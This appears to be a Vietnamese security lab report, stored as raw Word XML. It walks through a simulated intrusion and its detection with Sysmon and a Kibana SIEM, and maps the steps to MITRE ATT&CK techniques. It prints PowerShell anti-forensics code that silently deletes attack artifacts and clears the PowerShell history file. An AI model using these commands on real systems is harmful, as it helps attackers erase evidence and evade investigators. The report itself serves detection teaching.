                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mức độ nguy hiểm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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CCD2927" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High — risk_score: 73</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12088020" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B281547" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sau khi exfiltration thành công, svhw.ps1 thực hiện cleanup toàn bộ: xóa staging directory, ZIP file, và script payload. PowerShell history cũng bị xóa để cản trở forensic analyst tìm lại lệnh đã chạy. Cleanup sử dụng cmd.exe detached để tránh PowerShell process tồn tại quá lâu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC533D5" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57627A13" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># svhw.ps1 — Cleanup sau exfil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F202F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1A67C1C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Dung cmd.exe detached de xoa files (tranh PS history ghi lai lenh Remove-Item)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19829ED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Start-Process cmd -ArgumentList "/c timeout /t 2 &gt;nul &amp; rd /S /Q `"$wd`" &amp; del /F /Q `"$zp`""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4313FE3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-WindowStyle Hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710B42B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580C3B8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Xoa PS history — can trở forensic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685589D4"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$h = "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349582A7"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if (Test-Path $h) { Clear-Content $h -Force -ErrorAction SilentlyContinue }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2051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3C49A3E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EventID 23 ghi nhan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70210A3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TargetFilename: C:\Windows\Temp\wdmp.zip (sinh boi cmd.exe del)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E91B62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TargetFilename: C:\Windows\Temp\svhw.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7705A572"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2EA8F7DB"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Correlation Rule C5 bat sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233966B3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># EID 3 (outbound HTTPS) -&gt; EID 23 (file deletion) maxspan=120s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C25A835" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB2E885" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ngay cả khi attacker đã cleanup, Sysmon EventID 23 vẫn ghi nhận sự kiện xóa file — bao gồm SHA256 hash của file trước khi bị xóa. Nếu Sysmon được cấu hình với ArchiveDirectory, bản sao của file có thể được khôi phục cho forensic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D273D29" w14:textId="77777777" w:rsidR="00433F43" w:rsidRDefault="00433F43">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="423B25BD" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00433F43" w:rsidP="00602E07">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00433F43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F96A2D7" wp14:editId="6BED8E66">
            <wp:extent cx="6120130" cy="3527425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="195570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01476" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3527425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51420CFA" w14:textId="68F8AD26" w:rsidR="00433F43" w:rsidRDefault="00602E07" w:rsidP="00602E07">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="006D2C1A">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00140374">
        <w:t>Sysmon EventID 23 ghi nhận wdmp.zip và svhw.ps1 bị xóa — hash được preserve trong log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A421F89" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00602E07" w:rsidP="00602E07"/>
    <w:p w14:paraId="067F0461" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00602E07" w:rsidP="00602E07">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00602E07">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70A99F17" wp14:editId="0E65CC27">
            <wp:extent cx="6120130" cy="2308860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="192481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15320" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2308860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ABAF88" w14:textId="142EA2F0" w:rsidR="00602E07" w:rsidRPr="00602E07" w:rsidRDefault="00602E07" w:rsidP="00602E07">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="006D2C1A">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA1">
        <w:t>Alert C5 — Exfiltration → Indicator Removal xuất hiện trong Kibana SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC496FC" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00602E07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1884A2EC" w14:textId="700BABA4" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VIII. BẢNG MAPPING MITRE ATT&amp;CK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
        <w:gridCol w:w="1041"/>
        <w:gridCol w:w="1182"/>
        <w:gridCol w:w="1051"/>
        <w:gridCol w:w="1707"/>
        <w:gridCol w:w="1643"/>
        <w:gridCol w:w="1240"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01B4A" w14:paraId="50876BEF" w14:textId="77777777" w:rsidTr="001E275F">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162"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336AE90A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041"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277AEC0B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1182"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31BE1972" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1051"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64E2EDC6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sub-Tech</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707"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70C8AA15" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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5D31C9B5" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1240"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5A141C1D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="0660EA3C" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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644A323" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041"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2336476" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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8A1C853" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1566.002 + T1204.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1051"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18F009B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707"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616F5BA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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9DDBBFD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Browser/Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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A818890" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="5371ECC5" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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F06C52E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041"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51C75731" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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768D8B4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1051"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C4E4C6E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VBScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707"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2D6E60A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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943CB73" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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8E0CF00" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>S1, C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="68090E2B" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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4951D21" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Priv Esc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041"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78B537A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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70E5D04" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1548.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1051"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D13394C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fodhelper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707"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589E018" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 1, 13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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566B723" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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08C78F4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="102C243F" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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E71662E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041"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F69D565" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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A2C3FA2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1546.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1051"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E920FAE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707"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54705A48" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 19, 20, 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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5444E5A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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587EB680" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2, S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="7ED3C0C3" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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8772CE7" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041"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F024D3E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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65A2D9E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1546.003 (exec)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1051"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C950E64" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707"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D56063D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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83A525C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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0768B89" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C3, S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="79E8C67A" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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C96E94F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041"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48147E6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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EB03857" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1082 + T1016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1051"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596E5020" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707"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804B264" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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73C8D34" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
